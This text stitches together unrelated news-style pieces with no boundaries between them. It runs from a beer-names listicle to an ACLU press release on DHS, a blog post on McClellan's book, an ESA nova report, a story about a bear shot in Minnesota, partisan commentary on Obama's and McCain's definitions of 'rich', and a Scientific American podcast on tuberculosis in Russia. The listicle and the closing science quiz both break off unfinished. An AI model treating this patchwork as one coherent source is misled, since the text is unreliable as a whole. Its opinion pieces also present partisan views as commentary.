Top 10 : Weird Beer Names
Page 1 of 3
Strange beer names that inspire empty mugs
When it was originally enacted in 1516 , the Bavarian Purity Law stated that beer should only contain water , hops and barley .
It ’s a simple recipe that has n’t changed much through the years .
So , with these draconian limits governing their product , brewers have been forced to extremes when differentiating their products from competitors .
Some spend millions on slick advertising , while others pay a king 's ransom to athletes to pimp their beer .
But for smaller breweries , it ’s not that easy .
Even if they produce a nectar that ’s worthy of the Gods , it will rarely raise a blip in the crowded beer market .
So , these microbreweries have found an ingenious method to stand out from the clutter .
Freed from the constraints of corporate , focus group - obsessed marketing departments , they ’ve been able to develop bizarre , sometimes offensive and always attention - grabbing brand names , which results in strange beer names .
It was a grueling bit of research but we managed to find a plethora of strange beer names , and here are 10 of our favorites .
Number 10
Fiddler 's Elbow
Similar to tennis elbow , the intense pain and cramping of Fiddler ’s Elbow can be treated using the age - old R.I.C.E. method of first aid — rest , ice , compression , and elevation .
Or the sufferers can drown their agony by binging on this tart , citrusy wheat beer from the UK .
What ’s in a strange beer name ?
Wychwood , the small brewery responsible for this gem , draws its inspiration from the fantasy and mythical geography of the UK .
So , while it is a catchy sounding and strange beer name , Fiddler ’s Elbow is also a small village in Wales .
Number 9
Old Speckled Hen
This wildly popular English ale is proof that you do n’t need a GDP - like marketing budget or a stodgy name like “ Newcastle ” to be the highest - selling premium bottled beer in the UK .
Beer aficionados marvel at its combination of sweet and bitter flavors , which is something made possible by the special strain of yeast that has been used exclusively by brewers since 1896 .
What ’s in a strange beer name ?
The raging drunks that used to build MG automobiles back in the day used one particular MG to ferry around the factory .
They referred to this venerable , rust - spotted vehicle as “ The owld speckled ‘ un . ”
On the 50th anniversary of the car , the tongue - in - cheek brewmasters celebrated by creating a beer with the slightly more marketable name of Old Speckled Hen .
Number 8
Dogfish Head Snowblower Ale
A dogfish is a vile shark that feeds on small fish and invertebrates .
A snowblower is an over - priced alternative to the shovel .
Somehow , the two things overlap and for that wonderful reason , this glorious , seasonal beer was created .
What ’s in a strange beer name ?
Dogfish Head is a small craft brewery based in Delaware that is growing rapidly thanks in no small part to its immensely popular Lawnmower beer .
So , playing off that name , they decided to go with the winter equivalent for their cold - season offering .
Strange beer names with holiday spirit and evolution in mind …
House Homeland Security Committee must exercise oversight over DHS ’s creation of militarized zones within the US
Contact : ( 202 ) 675-2312 , media@dcaclu.org
WASHINGTON , DC – Today , when Department of Homeland Security ( DHS ) Secretary Michael Chertoff testifies before the House Homeland Security Committee , the American Civil Liberties Union calls on the committee to exercise vigorous oversight of the many DHS programs that endanger U.S. citizens ’ privacy and civil liberties without increasing security .
DHS ’s unchecked detention and deportation powers have resulted in abusive interrogations of families with children at checkpoints , creation of militarized zones within the U.S. and widespread fear in immigrant communities facing natural disasters .
Collectively , these practices illustrate how DHS has mismanaged its authority and wasted resources .
“ The Department of Homeland Security has far too many ill - conceived programs that fail to account for privacy , due process and other principles that assure fairness to the innocent , ” said Caroline Fredrickson , director of the ACLU Washington Legislative Office .
“ It is time for Congress to recognize the Bush Administration ’s security apparatus is an emperor without any clothes .
“ DHS ’s collection of personal data on millions of U.S. citizens and its ever - expanding surveillance infrastructure should raise alarms for the committee .
DHS provides the illusion of security without the purported benefits to our nation .
“ The Akif Rahman experience is an example of DHS ’s inept border screenings .
This week , during an event to mark the one millionth name record on the terrorist watch list , Rahman , an American citizen , spoke about how he has repeatedly been detained at the U.S. - Canada border .
Rahman has been interrogated extensively about the mosque that his family attends and his religious observances .
Yet , after being shackled and submitting to humiliating searches , he is always ‘ cleared ’ to leave .
When he finally filed a lawsuit , he learned that many U.S. citizens of Arab or South Asian descent suffer the same degrading fate .
The committee should question Secretary Chertoff about the department ’s targeting of American citizens .
“ The committee also needs to investigate reports of racial profiling at the immigration checkpoints that involve Latino residents being disproportionately stopped .
The presence of DHS and National Guard agents in the Rio Grande Valley as far as 150 miles into the U.S. has transformed many towns into militarized zones .
Customs and Border Patrol ( CBP ) have immigration checkpoints in the Texas towns of Sarita , Falfurrias and Laredo .
This past May CBP made announcements in the media that it intended to continue screening for immigration status at these checkpoints during natural catastrophes and emergency situations .
Fortunately , when Texas Governor Rick Perry pointed out that the checkpoint delays could cost lives , CBP retracted its statement but has yet to fully communicate this to the residents of the Rio Grande Valley . ”
For information about the terror watch list , go to : / watchlist
It would be easy to think of Scott McClellan 's new book as a piece of dish , designed for sales , pitched for controversy , packed with juicy detail .
And it is that , of course .
But it is also something more .
It is an argument by a man very , very close to the president , and deputed to be his spokesman for many years , that the president deliberately deceived the country about the reasons for going to war .
We 're not talking mistakes here ; we 're talking about a deliberate shading of the truth to hide the real motivation for risking the lives of thousands of soldiers and hundreds of thousands of innocent civilians :
In Iraq , McClellan added , Bush saw " his opportunity to create a legacy of greatness , " something McClellan said Bush has said he believes is only available to wartime presidents .
The president 's real motivation for the war , he said , was to transform the Middle East to ensure an enduring peace in the region .
But the White House effort to sell the war as necessary due to the stated threat posed by Saddam Hussein was needed because " Bush and his advisers knew that the American people would almost certainly not support a war launched primarily for the ambitions purpose of transforming the Middle East , " McClellan wrote .
" Rather than open this Pandora 's Box , the administration chose a different path not employing out - and - out deception , but shading the truth , " he wrote of the effort to convince the world that Saddam had weapons of mass destruction , an effort he said used " innuendo and implication " and " intentional ignoring of intelligence to the contrary . "
" President Bush managed the crisis in a way that almost guaranteed that the use of force would become the only feasible option , " McClellan concluded , noting , " The lack of candor underlying the campaign for war would severely undermine the president 's entire second term in office . "
If this is true , if the president intentionally ignored data refuting the existence of Saddam 's WMDs , he should be impeached .
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
Science & Exploration XMM - Newton discovers the star that everyone missed
18/07/2008 1269 views 1 likes
XMM -Newton has discovered an exploding star in the Milky Way .
Usually that would be important in itself , but this time there is a special twist .
Calculations show that the explosion must have been clearly visible to the unaided eye but was missed by the legions of star watchers around the planet .
On 9 October 2007 , ESA ’s orbiting X - ray observatory XMM - Newton was turning from one target to another .
As it did so , it passed across a bright source of X - rays that no one was expecting .
The source was not listed in any previous X - ray catalogue , yet XMM - Newton was receiving some 50 X - rays every second from this mysterious object .
V598 Puppis
The only celestial object the XMM - Newton team could find at this location was a faint star , known only by its catalogue number USNO - A2.0 0450-03360039 .
Acting quickly , Andy Read of the University of Leicester and Richard Saxton of ESA ’s European Space Astronomy Centre ( ESAC ) , Spain , arranged for an astronomical telegram to be circulated across the Internet , informing other astronomers of the newly - discovered X - ray source .
Astronomers using the 6.5 - m Magellan - Clay telescope at Las Campanas Observatory in Chile , found that USNO - A2.0 0450 - 03360039 had dramatically brightened by more than 600 times .
Analysing the light from the source meant that they could classify the object as a nova .
Novae occur when a compact star , called a white dwarf , feeds off the gas of a nearby companion star .
When sufficient gas builds up on the white dwarf , a nuclear reaction begins releasing large quantities of energy , prompting the white dwarf to shoot up in brightness .
All the sources detected in the XMM - Newton slew survey
But there was a puzzle .
The incandescent explosion does not immediately release X - rays ; the expanding cloud of debris created in the detonation temporarily masks them .
As this clears , the X - rays shine through .
So , for XMM - Newton to see this nova , the explosion must have taken place many days before .
Yet , no one had reported seeing it .
Usually , dedicated amateur and professional astronomers find novae by regularly sweeping the night sky for stars that suddenly brighten .
This one , it seemed , had slipped the net .
Saxton contacted the robotic survey project ASAS and asked them to check their data .
They found the nova .
It had taken place on 5 June 2007 and had been clearly visible , even to the unaided eye .
“ Anyone who went outside that night and looked towards the constellation of Puppis would have seen it , ” says Saxton .
XMM -Newton
The nova is now officially designated V598 Puppis and is one of the brightest for almost a decade , doubling the irony that it was not spotted during its brilliant peak .
As news of it spread , the global effort to track its fading light became intense .
“ Suddenly there was all this data being collected about the star .
For variable star work like this , the contribution of the amateur community can be at least as important as that from the professionals , ” says Read .
Thanks to XMM - Newton , this story has a happy ending , but it does make astronomers wonder whether there are other discoveries going unnoticed too .
Notes for editors :
This nova was discovered in the XMM - Newton slew survey ; a systematic processing of data taken while the satellite moves between objects .
To date , the survey has covered 30 % of the sky and produced a catalogue of 7700 X - ray sources that has been released to the public .
XMM - Newton slew survey discovery of the nova XMMSL1 J070542.7-381442 by Read et al. is published in Astronomy and Astrophysics .
The first XMM - Newton slew survey catalogue : XMMSL1 by Saxton et al. is published in Astronomy and Astrophysics .
The XMM - Newton science teams are based in several European and US institutes , grouped into three instrument teams and the XMM - Newton Survey Science Centre ( SSC ) .
Science operations are managed at ESA ’s European Space Astronomy Centre ( ESAC ) , at Villanueva de la Cañada near Madrid , Spain .
Spacecraft operations are managed at ESA ’s European Space Operations Centre ( ESOC ) in Darmstadt , Germany .
The shooting of a black bear that wandered for six days with a plastic food jar covering its head in northern Minnesota has prompted angry calls and e-mails to police who shot it and debate in online forums .
The bear , a male about 2 years old that appeared to be starving and sickly after days without food or water , was shot Saturday night by police in the town of Frazee , which was bustling with visitors celebrating Turkey Days .
That sighting was the last of several of the bear reported over a period of almost a week .
" With all the people around ... you 're never sure what the outcome is going to be , " said Rob Naplin , a wildlife supervisor for the state Department of Natural Resources in Park Rapids .
Naplin said efforts had been made to trap the bear as it moved from spots in or near Itasca State Park .
At one point , the DNR was equipped to tranquilize the animal , " but we never had the opportunity ... because it stayed in forested areas " from its initial spotting July 21 until it met its fate in Frazee , he said .
Naplin said the bear " was in pretty tough condition after not being able to eat or drink for several days . "
The 2.5 - gallon plastic jar is the type that usually holds candy or popcorn , he said .
Frazee Police Chief Mike Lorsung said that at the direction of a DNR conservation officer , one of his officers killed the bear with one shot .
He said his department did not have ready access to a tranquilizer gun and that approaching the animal to try to remove the jar would have been too dangerous .
Also , the bear was behind the Baer Building while festivities were going on in front , he said .
On Wednesday night , Frazee police said they have received dozens of e-mails and calls , some from Georgia and California , most accusing them of acting too hastily .
But almost no Frazee residents present the day the bear was shot complained , police said .
After the bear was killed , a game warden pulled for some time before the jar came off the bear 's head , Frazee police said .
The candidates define ‘ rich ’
At last night ’s forum at Saddleback Church , the Rev. Rick Warren asked a nearly identical set of questions to Barack Obama and John McCain , but one of the more memorable inquiries was just two words : “ Define rich . ”
Obama started with a joke at Warren ’s expense — “ You know , if you ’ve got book sales of 25 million … . ” — which got plenty of laughs .
Obama added that those making more than $ 250,000 a year are in the top 3 % or 4 % of the population .
He added , “ Now , these things are all relative and I ’m not suggesting that everybody that is making over $ 250,000 is living on easy street , but the question that I think we have to ask ourselves is if we believe in good schools , if we believe in good roads , if we want to make sure that kids can go to college , if we do n’t want to leave a mountain of debt for the next generation , then we ’ve got to pay for these things .
They do n’t come for free . ”
Obama concluded by saying those who make $ 150,000 or less will see a tax cut under his administration , and those making more than $ 250,000 or more will see a “ modest increase , ” as part of the broader effort to “ create a sense of balance and fairness in our tax code . ”
McCain was asked the exact same question , and I want to republish his response in full , because I think it offers a peek at McCain ’s way of thinking .
“ Some of the richest people I ’ve ever known in my life are the most unhappy .
I think that rich is — should be defined by a home , a good job and education and the ability to hand to our children a more prosperous and safer world than the one that we inherited .
I do n’t want to take any money from the rich .
I want everybody to get rich .
I do n’t believe in class warfare or redistribution of the wealth .
But I can tell you for example there are small businessmen and women who are working 16 hours a day , seven days a week that some people would classify as , quote , ‘ rich , ’ my friends , who want to raise their taxes and raise their payroll taxes .
Let ’s have — keep taxes low .
Let ’s give every family in America a $ 7,000 tax credit for every child they have .
Let ’s give them a $ 5,000 refundable tax credit to go out and get the health insurance of their choice .
Let ’s not have the government take over the health care system in America .
“ So I think if you ’re just talking about income , how about $ 5 million .
But seriously , I do n’t think you can — I do n’t think , seriously that — the point is that I ’m trying to make here seriously — and I ’m sure that comment will be distorted , but the point is — the point is — the point is that we want to keep people ’s taxes low and increase revenues .
And my friend , it was not taxes that mattered in America in the last several years .
It was spending .
Spending got completely out of control .
We spent money in a way that mortgaged our kids futures .
My friends , we spent $ 3 million of your money to study the DNA of bears in Montana .
Now I do n’t know if that was a paternity issue or a criminal issue , but the point is — but the point is it was $ 3 million of your money .
It was your money .
“ And you know , we laugh about it , but we cry and we should cry because the Congress is supposed to be careful stewards of your tax dollars .
so what did they just do in the middle of an energy crisis when in California we are paying $ 4 a gallon for gas , went on vacation for five weeks .
I guarantee you , two things they never miss , a pay raise and a vacation .
And we should stop that and call them back and not raise your taxes .
We should not and cannot raise taxes in tough economic times .
So it does n’t matter really what my definition of rich is because I do n’t want to raise anybody ’s taxes . ”
Oh my .
Now , McCain ’s been around politics a long time , and he ’s learned how to use these interviews to his advantage .
He knows to ignore the question asked , and offer the preferred answer , whether it makes sense or not .
People will remember what you have to say , not whether you answered or dodged the question .
In this case , it was a two - word question : “ Define rich . ” Obama answered it .
McCain rambled a bit about richness in our lives , which transitioned to misleading rhetoric about small businesses , which transitioned to bizarre complaints about a government take - over of the healthcare system .
Before long , we were into bear DNA , congressional recesses , and energy prices .
McCain did n’t really like Warren ’s question , so he told us all about the various other issues on his mind .
The audience did n’t seem to mind .
But somewhere along the line , we got to the answer : $ 5 million .
As far as McCain is concerned , if you make $ 4.9 million a year , more than 99.9 % of the population , you ’re not quite rich .
Just how out of touch is John McCain ?
On the one hand , he ’s running ads talking about how “ tough ” times are “ for the rest of us , ” but on the other , McCain , one of Congress ’ wealthiest members , thinks people who make millions of dollars a year are n’t quite rich , and he does n’t want to bother them with taxes anyway .
If anything from last night comes back to bite McCain on the butt , it ’s this .
Veteran journalist Merrill Goozner , director of the Integrity in Science project at the Center for Science in the Public Interest , discusses his series of articles for SciAm.com on the rise of tuberculosis in Russia .
Plus , we 'll test your knowledge of some recent science in the news .
Web sites mentioned in this episode include www.gooznews.com; www.snipurl.com/goozner
Podcast Transcription
Male voice : [ This ] podcast is sponsored from the people of American Chemistry , who provide the plastics , medicines and innovations that make life modern .
Learn more at www.americanchemistry.com
Steve : Welcome to Science Talk , the weekly podcast of Scientific American for the seven days starting August 27th , 2008 .
I 'm Steve Mirsky .
Tuberculosis is n't back because it never really goes away .
We have a series of Web articles up this week about the savage rise of TB in a multidrug - resistant form in Russia .
They were written by veteran journalist Merrill Goozner .
He was the chief Asia correspondent and chief economics correspondent for The Chicago Tribune .
He is now the Director of the Integrity in Science Project at the Center for Science in the Public Interest .
I called him at his office in Washington , D.C .
Steve : Hi Merrill , great to talk to you today .
Goozner : Pleasure to be with you .
Steve :
This is an incredibly ambitious package that we have up on the Web site that you 've pretty much done in its entirety .
First , tell us what we are doing in Siberia .
Goozner :
Well , I was asked to go there by Scientific American as part of a , sort of a , planned tour that had been put together by some nonprofit organizations that wanted to show off their efforts over the last decade in improving the way tuberculosis in general and in particular drug - resistant tuberculosis , multidrug - resistant tuberculosis , is being treated — in a corner of Siberia , where they thought it was a good model for what could be done around the world .
Now of course , you know , there were several journalists on the trip and Scientific American paid for the whole trip .
But after they took me out there , I had been a foreign correspondent in the past when I was working for The Chicago Tribune and had n't been in Russia since the 1992 and even then it was in the Russian Far East , so it was interesting to return to the country almost two decades later and see the remarkable economic change that had been underway , but also many of the social problems that were still there .
Steve : Now , TB was not a problem of this magnitude the last time you were there .
Goozner :
Well , you know , it was just at that point when Soviet communism had fallen , Boris Yeltsin was president and , you know , a new democracy was being born in Russia ; at least that was the way it was being portrayed .
But the transition from the old system to the new system was very rough and it was right at that point where the old economy was collapsing and the problems that came from that had not yet emerged but would within two or three years after I was there .
In particular lot of people lost their jobs , there was a huge increase in crime , unemployment .
I guess a better way to put it is unemployment and then the things that rose from that — crime , drug abuse , IV drug use , and AIDS epidemic and , of course , a tuberculosis epidemic .
The prison population in Russia soared in the years after the fall of communism .
Well over a million people ended up in jail .
They are now down to about 75 percent of that as the economy has improved , but it was really a fast growing situation in those days , and then really by the middle of the '90s , they had a full - blown tuberculosis epidemic , but really which is coincident with poverty .
Tuberculosis in the end is a disease of poverty and stress and it emerged in full force from the deteriorating social conditions , especially in Siberia and the Russian Far East .
Steve : Now Siberia and the Russian Far East are , you know , are fascinating in its own right , but it's also just a , kind of , case study , because this same kind of thing does happen anywhere in the world and can happen anywhere in the world .
I mean , here in New York City , we saw a big comeback by TB and multidrug - resistant TB in the mid '90s as well .
Goozner : Just as in Russia , the epicenter of the epidemic was in the prisons .
It sort of was its starting point .
You have a lot of people all of a sudden in crowded condition [s ] who were undergoing tremendous stress .
One thing people do n't realize is that a third of the world 's population has what 's called latent TB in them .
But their immune systems have combated it successfully on their initial infection and it basically stays submerged within your body .
If you have it , you can for [ your ] entire life .
But what happens is that if you 're under tremendous stress , poor nutrition , you know , your immune system becomes weakened and it can emerge again and become a virulent infection , and that 's what happened in Russia .
And there is some thought that when this emerged in the New York City prison system in the mid '90s , that it in fact had been introduced there by some of the Russian population that had left the former Soviet Union , wound up in New York .
There is a very large Russian population in New York and that some of those people ended up in the prison system and just as it spread a plague in Siberia it spread it in New York City .
The pioneering work of — who is now the Health Commissioner — Tom Frieden was very successful in stamping out and showing that you can in fact treat tuberculosis and some of the techniques that he used there were later transferred back to Russia by some of the NGOs that we visited there .
Steve :
That 's fascinating .
I had never heard the connection before between the Russian outbreak and the New York outbreak .
I thought the New York outbreak was homegrown and it may be , but it is a really interesting theory that the two are intermittently connected .
Tell me about the kind of treatment that you have to perform .
It 's incredibly labor intensive .
Goozner : Tuberculosis was , you know , if you were to go back into the 19th century and the early part of the 20th century it was sort of like cancer was today .
There was a kind of almost like mythology around the disease , almost a romance around it .
Steve : Yeah , La Boheme , it 's a romantic disease but it is nothing like that in real life .
Goozner : Right .
And the age - old scourge , mankind thought there was this miraculous cure that emerged in the late 1940s when Dr. Selman Waksman discovered streptomycin — there was a cure , it was thought , for tuberculosis .
But what was rapidly discovered literally within a few years of the introduction of streptomycin to treat tuberculosis was that TB had the ability to mutate and or it will to a resistant strain that would quickly become dominant ; and they would therefore the drug as a single drug was not effective .
And over the years , tuberculosis became one of the first diseases where it was widely recognized that you had to use multiple antibiotics in order to cure [ it ] and it is just a question of statistics that if you hit an organism in two , three or four places at the same time , it becomes almost statistically impossible for a mutant to survive that kind of environment .
So , tuberculosis became a disease that you had to treat with multiple drugs and the World Health Organization by the 1980s had adopted this as its primary way of treating tuberculosis .
It 's called Directly Observed Therapy and — it 's called DOTS — and the reason why it had to be directly observed is because you had to hit tuberculosis with multiple drugs all for a long period of time , about six to nine months ; it is a very relatively slow - growing organism .
It only reproduces once a day so that you have to , you know , some of the drugs only hit it at the point at which it is reproducing and then , of course , they were like , as we talked about earlier , latent tuberculosis deep within the lungs .
Very often that , you know , would take a while before the drugs can hit them at a point at which they will be vulnerable and so this became the recommended therapy , Directly Observed Therapy .
Well , as you can well imagine in many settings in the world , enforcing that kind of regimen over that longer period of time , taking the same drugs everyday , some of which have nasty side effects , for six to nine months , there was a lot of breakdowns in places .
And of course what happens when that occurs is that the resistant strain with the longest life in those particular bodies become dominant and then you have what is called multidrug - resistant tuberculosis ; and that , of course , is with the new programs coming where there is now new antibiotics , some of the fluoroquinolones get added to the older regimens or older antibiotics and what you have is treatment for up to two years , again Directly Observed Therapy , everyday to close to two years in order to wipe out multidrug - resistant tuberculosis
We have this image in our minds that MDR - TB , as it 's known , is a worse disease than TB .
That 's not really the case .
They are really the same disease .
It 's just that they had become much harder to cure , and of course tuberculosis will kill you if you do not successfully treat it .
And so that became the sort of goal of these nonprofits that were doing work first in Peru , like Partners In Health at Boston , which is a very famous one run by Paul Farmer ; he went into a low - income setting .
The first case , that was Peru , and they said , you know something , if you 're going to tackle the tuberculosis epidemic in this country — which means treating the vast majority of people with that six to nine month therapy or Directly Observed Therapy with four drugs — then you really have to create the infrastructure to treat those cases that have already failed the multidrug - resistant tuberculosis ; that if you build that kind of system that can deliver that , you will get the others , too .
And that 's what they tried in Peru with some success .
And that 's the system beginning about a decade ago they exported into Russia , because in Russia you had some people , like people we visited in Tomsk which is a province in the Central Plateau ( unclear 10:40 ) where the public health authorities there had a huge outbreak in the prison but they were open to new ideas .
They were not wedded to the old Soviet style of centralized medicines , which was very dependent on a lot of operations — it was almost idiosyncratic in the way they used drugs — but Russia under communism had pretty much gotten their tuberculosis under control and it was only with the fall of communism that they had this huge outbreak to which they really needed much more public health–oriented approaches than the , kind of , idiosyncratic approach that they had in the past .
And so what they did then was it that they [ started ] working with Partners in Health , they said , " Okay , let 's try this DOTS approach and let 's try this DOTS - Plus approach , " in other words , going the full two years with the MDR - TB .
And if we institute that kind of system we will be getting all the people who are sick and therefore we wo n't be getting reintroduction or that much reintroduction back into the community .
If we are successful , and that will be able to damp down the epidemic .
It will be a wonderful story if I could tell you now that they have been tremendously successful .
In fact in the last two or three years , we 've begun to see a reduction in the total amount of cases in Tomsk province and , you know , is this because the economy is improving ?
Is it because they are treating it better ?
They are certainly treating it better .
So you like to think that that is part of it , but there has n't been the really sophisticated studies that you would need to do to , sort of , say that the public health approach that they have introduced there was really the factor .
So it is important to remember that when economies improve , public health problems tend to diminish like a tuberculosis outbreak ; and in the last three or four years , especially with the rise in the price of oil , the Russian economy has been improving quite a bit .
And we saw that when we were in Tomsk there were a lot of cars on the street , there were a lot of stores that were opened .
There seemed to be a much higher level of prosperity — at least according to the people , I was n’t there six to ten years ago — but to the people I talked with there said that the economy was much better today than it had been in the fairly recent past .
Steve : I just want to reiterate Directly Observed Therapy or DOT requires somebody to actually watch the patient take their drugs multiple times a day .
It 's incredibly labor intensive .
Goozner : Exactly .
It 's a system that really requires the hands - on approach by people working in the health care system and they have created a very sophisticated system .
They have actually people who , you know , many of the people are alcoholics living in very low - income housing projects , IV drug abusers .
We are trying to get their lives together and they have actually even created a system which they call Sputnik , where a driver and the nurse will actually go to the homes everyday of the people who they are treating for MDR - TB and make sure that they take their drugs .
Steve :
Because people do n't like to take these drugs necessarily everyday for months and years .
Goozner :
Well , two things , there is two reasons to that .
One is the drugs have some side effects .
Some of the antibiotics [ ' side effects ] are well known :
You know , they give you bad dreams , hallucinations , and , you know , it is not universal but there is a percentage of people who are more affected in that [ it 's ] very difficult to keep down for some people .
But just as importantly when you are successfully treating tuberculosis , you are not sick for six to nine months .
You are only sick , you know , your disease becomes your sputum .
Your ability to pass it to other people , the bacterium load goes down so low after the first few months that you are sputum negative , in other words you are not even infectious anymore .
So you do n't have symptoms of the disease — either you are not coughing up blood or hacking the way that you would with tuberculosis when it was really active and raging within your body .
So unattended you might think , " Hey , I am cured ; why should I take all these drugs or all these side effects for another four months or nine months ? "
And a lot of people would do that .
That 's why the preferred way of treating this is called Directly Observed Therapy — [ it 's ] hands on , very labor intensive as you said to make sure that these people wipe out that disease inside them .
Steve : And Paul Farmer has had a great deal of success and he is an amazing guy , but also in Haiti I believe with DOT and HIV
Goozner : Exactly , yes , and you know Paul Farmer and Partners in Health is the group who have been working in Tomsk to set up these programs .
We interviewed a number of people there , not that they have a very important philosophy when they go out there .
Their feeling is that we are there to advise and it's really that we have to build a local infrastructure and give them the ability to do this .
You can't rely on the kind [ ness ] of strangers for ever .
You have to build a local infrastructure for delivering this kind of healthcare if it 's really going to succeed over the long run .
Steve : Yeah , you have , your neighbor comes over in some cases to make sure that you are taking your medications .
Goozner :
That 's right .
We actually saw a case of that in a rural housing project in Russia , where an elderly woman has had her tuberculosis cured and it was somebody who was in the building next door and they actually had a very important principle , which is the easiest thing you would say , you just appoint some family member to do it ; but they say " No you ca n't do that , " they do n't allow family members to do it .
Because it 's very easy for like a brother or a son to [ say ] tell , " Mother , do n't bother me anymore , get out of here , I do n't want to take those .
You know , you could almost forbid family 's spat ; so they make it actually a requirement that a neighbor do it rather than somebody who is inside your own family .
Steve :
Now do the public health officials , or the public health officials know , but do the other political officials understand that the very conditions that , I am not even talking about the economic conditions , but just the structures that incarcerate people , the crowding , all of that contributes not only to the transmission of the disease but actually to the evolution of the disease ?
Goozner :
Well , I think they understand it , but you know when we were dealing , we did visit a prison system there and I think that in the prisons you have to remember that these are not people that the society looks on with great fondness .
If you have been sent to prison , like in any society , you are an outcast , you 've been cast out of society ; and so while they recognize it from a public health point of view , it 's not like they are being given the resources to set up some kind of spa facilities .
And so it's on the one hand you could say , yes when they put people who are infected with multidrug tuberculosis in the same ward together , they isolate him from everybody else but they are all in there together you said , it might got to you , you could have transmission and retransmission between each other , sort of like a colony for breeding .
Steve :
It 's an incubation center .
Goozner : Exactly and you got to realize , " Well , but look at what they have actually done [ gone ] though . "
They have isolated them ; they are all being treated with the drugs .
There are cure cases that are taking place when they become sputum negative .
They get moved out into another center where they 're not being exposed to the other people who are still sputum positive .
So they have really put in place a system where , given the limited resources , they are doing the best that they can , but you know in an ideal situation , that 's not how you would treat it .
Steve : No , and especially a prison or a hospital has a semi-permeable membrane .
There are people coming in and out of that place all day and some of that multidrug - resistant TB can get out into the general population through a guard or a cook ; and so it's in everybody 's enlightened self interest to make sure that the people in those situations get treated as much as possible .
Goozner :
And of course that was one of the most tragic stories that we saw there .
We actually also visited the tuberculosis sanatorium which was run not as a prison system hospital , but , you know , where the tuberculosis hospital for the entire province , where if you were sent if you got tuberculosis until you were sputum negative then you can go back into the community ; and we saw a young girl who had what is called XDR tuberculosis — extremely resistant tuberculosis , which means that she failed the drug for multidrug - resistant TB .
What happened was , she was only like 22 - years - old and she has been there three years and she had had half of one her lungs removed already in an operation .
What happened to her ?
She lived in a housing project .
A man got out of prison .
He had been , sort of , the first anecdote of our first story .
He had been in prison .
He had gotten tuberculosis .
He had been cured .
He had gotten it again .
He was taken to regimen again but his term was up .
He was free to go .
When immediately he got out of prison , he stopped taking the drugs and of course the disease that came back was multidrug - resistant .
A similar situation , a man got out of prison , he moved into her housing complex after getting out and the multidrug - resistant tuberculosis came raging back in him and he spread it to her .
So her initial infection , you know , she could have caught it in the hallways wherever and she originally got multidrug - resistant TB while she was young rather gradual[ly ] .
She could n't keep the drugs down .
She was constantly vomiting from the side effects and as a result she went off therapy .
Even though she was in the hospital and ended up with extremely resistant tuberculosis and it was taking them three years .
But to get to the [ broader ] border point that you raise when you asked the question .
Exactly , these places are incubators of plague , the prison [s ] .
People are going in and out of the prison all the time .
They return back to society and the returning back to the society that Russia , especially out in Siberia , parts of it are , you know , what you would call , you know , second world and it's not the extreme poverty of the African nations or some other parts of the world .
It 's not third world , you know , the traitors of the Soviet system have left pockets of Russia with extreme poverty and there were parts of this town where we worked , Tomsk , that certainly fell into that category .
Steve :
And if memory serves , I think we have over two million people incarcerated in the U.S .
Goozner :
That 's right .
We have a population that 's significantly larger , you know , one - third larger , but you know our population per capita is probably the highest in the world or among them .
Steve :
The prison population ?
Goozner : Prison population .
Steve :
And so it 's a condition that is just below the surface at all times all around the world and this can happen anywhere .
Goozner : Absolutely .
Steve :
This is a fascinating package ; it 's up on our Web site .
Let 's take just a couple of minutes .
You are the author — the book came out a few years ago , The $ 800 Million Pill — and while we have you here , tell us a little bit about that book .
Goozner :
Well , it came out in 2004 and it was an effort to look at the drug development process in a , sort of , holistic way to look at where the sources of innovation were in the pharmaceutical industry and the biotechnology industry and , you know , what were the real drivers of that .
Is it money ?
Which is what we all so often hear , it cost [s ] $ 800 million to develop a new drug .
What I tried to point out in the book , by looking at a whole series of stories that some of the more innovative drugs that come out over the past quarter century .
This is to say that really pharmaceutical innovation , biotech innovation , is a product of science .
[ A ] lot of it funded [ is ] in the public sector and the interaction of science with public health need and sort of devoting the societal resources and intellectual energy to sort of come up with new approaches to diseases that are the really serious things that we face as a society .
It does n't guarantee success but certainly the idea that you can simply pour money into a disease stage and somehow get new drugs out that would cure it at the bottom of some process is really not the way drug development happened over the years .
And the book is a way of trying to put the third dimension into a debate over the cost of developing new drugs that I found all too often was lacking in public discussions about the issue .
Steve :
And the book also points out just how many drugs actually are discovered , because lots of them are natural products in our government labs or in our government - funded labs .
Goozner : Absolutely .
You know , it was much more true if you look back , you know , say before 1990 or so , but in the last two decades we 've had a much higher emphasis on the private sector being the primary driver of drug innovation , and I think one of the great iron [ ies ] y is that it is n't really pointed out is that as we have shifted more to a private sector emphasis in bringing new significant drugs to market , the number of new drugs coming being approved by the FDA have steadily fallen ; and , in fact , last year was the lowest level in several generations .
So I think recent experiences suggested that that when you allow money to drive the process rather than science and public health need , you can often wander into blind alleys ; and it's because of the marketing needs of those organizations .
" Hey , they are poor [ for -] profit companies .
That 's what they are there to do with this is to make money .
That 's their primary obligation [ to ] the stock holders .
But as one of the people that I quoted in my book pointed out , when you 're looking at the market to tell you what to do , then it's by definition not innovative , because the market is always about whats already exist[s ] , and to find what 's really needed you really have to be much closer to the bedside , much closer to the public health needs of the given society .
We could , the drug industry if it wanted to , could be developing drugs , new and better antibiotics for tuberculosis for instance , but it does n't because the market for those drugs is too small for them to really devote significant resources .
And that 's why you have so many nonprofit groups that have sprung up in the last 10 – 15 years , many of them funded by the Bill and Melinda Gates Foundation and to a certain extent multilateral organizations to develop new drugs for what are called neglected diseases of the developing world .
There may not be a market , but definitely [ there ] is a social need and given resources , not the level of resources that industry would spend on a new drug , but a sufficient level of resources , it 's possible to come up with new drugs , new vaccines , for many of those diseases and there is thousands of scientists out there working on it , and of course the poorest part of the series on tuberculosis takes a look at some of those efforts .
Steve :
Now to mention the market does not take into account the societal economic cost when one of the diseases breaks out and is not treatable .
Goozner :
That 's right .
Steve :
This has been great talking [ to you ] ; I really urge everybody to read the report on our Web site and Merrill thanks very much .
Goozner :
Thanks for having me .
Steve : Merrill 's articles and slide shows are all available at www.SciAm.com.
Also check out his blog at www.gooznews.com.
( music )
Now it 's time to play TOTALL ....... Y BOGUS .
Here are four science stories , but only three are true .
See if you know which story is TOTALL ....... Y BOGUS .
Story number 1 : New higher incarceration levels account for 60 percent of the increase in TB in post communist European countries .
Story number 2 : Cows apparently have the ability to sense the Earth 's magnetic field .
Story number 3 : Neandertal stone tools were inferior to Homo sapiens ' which could be why Neandertals went extinct .
And story number 4 : Ear infections in infancy may be linked to adult obesity .
Time is up .
Story number 1 is true .
